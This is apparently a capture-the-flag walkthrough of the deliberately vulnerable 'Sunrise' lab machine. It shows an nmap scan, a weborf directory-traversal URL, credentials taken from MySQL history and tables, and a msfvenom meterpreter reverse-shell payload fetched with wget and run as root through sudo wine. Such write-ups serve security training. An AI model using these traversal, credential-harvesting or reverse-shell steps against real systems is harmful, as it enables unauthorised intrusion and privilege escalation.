Good day, today I will walk through Sunrise from the Sunset series of machines.
Explor1ng
First, scan for open ports.
![](../img/post5/image1.png)
arp-scan -l
nmap 192.168.2.103
Boot2User
On port 80, I see an Apache server with the default nginx file, but on port 8080 another web server is running that looks vulnerable, so let's check it.
![](../img/post5/image2.png)
After scanning the server, I find the vulnerability "weborf 0.12.2 - Directory Traversal".
![](../img/post5/image3.png)
In the passwd file you can see the names of 2 users (sunrise and weborf).
![](../img/post5/image4.png)
To find hidden files in the weborf server's home directory using the web vulnerability, I use dirb.
![](../img/post5/image5.png)
dirb http://192.168.2.103:8080/%2f..%2f..%2f..%2f..%2f..%2f..%2fhome%2fweborf/
Excellent, in the MySQL history file I found server credentials, and now I can log in via SSH.
![](../img/post5/image6.png)
weborf:iheartrainbows44
Sunrise
Using the credentials, I log in to MySQL. After that, I find the sunrise user's credentials in the mysql database.
![](../img/post5/image7.png)
mysql -u weborf -p<
show databases;
use mysql;
SHOW tables;
SHOW COLUMNS FROM user;
SELECT User FROM user;
SELECT Password FROM user;
Now you can log in via SSH with the rights of the sunrise user.
![](../img/post5/image8.png)
sunrise:thefutureissobrightigottawearshades
Boot2Root
Using the sudo -l command, I see that I can run wine with root privileges.
![](../img/post5/image9.png)
sudo -l
Since wine is designed to run files with the .exe extension, I will generate a payload for Windows using msfvenom. After generating the payload, I move it using the apache2 server.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.2.100 LPORT=1313 -f exe > shell.exe
service apache2 start
wget http://192.168.2.100/shell.exe
After running shell.exe, I get root access.
![](../img/post5/image11.png)
And here is the root flag.
![](../img/post5/image12.png)